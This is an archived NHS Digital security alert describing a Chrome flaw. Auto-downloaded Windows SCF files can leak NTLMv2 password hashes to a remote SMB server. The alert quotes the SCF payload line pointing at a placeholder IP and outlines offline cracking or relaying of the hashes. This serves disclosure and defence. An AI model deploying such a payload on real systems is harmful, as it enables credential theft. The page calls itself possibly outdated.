Google Chrome flaw could allow Windows credential theft
This content has been archived
This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk
Summary
Affected platforms
The following platforms are known to be affected:
Threat details
Research reveals that due to the default configuration, Chrome automatically downloads the files as it is considered safe by the browser and does not prompt the user for any action,
This is a serious issue, especially while handling Windows Explorer Shell Command File or SCF (.scf) files. SCF files are a text file that launches commands without requiring any user action and can be used to trick Windows into an authentication attempt to a remote SMB server, which then, in turn, gathers victims' usernames and Microsoft LAN Manager (NTLMv2) password hash. The testing of various anti-virus solutions against the downloaded files it was found that none of them reported SCF files as suspicious which is quite critical from a host system security point of view.
The following two lines of code can make Windows attempt authentication to a remote SMB server.
[Shell] IconFile=\<ip_addr>\icon
Once this file is downloaded, an automatic request is made to view the file and the attackers’ remote SMB server captures the username and NTLMv2 password hash for offline cracking or relays the connection to an externally available service accepting the same authentication method.
Remediation steps
Last edited: 17 February 2020 11:31 am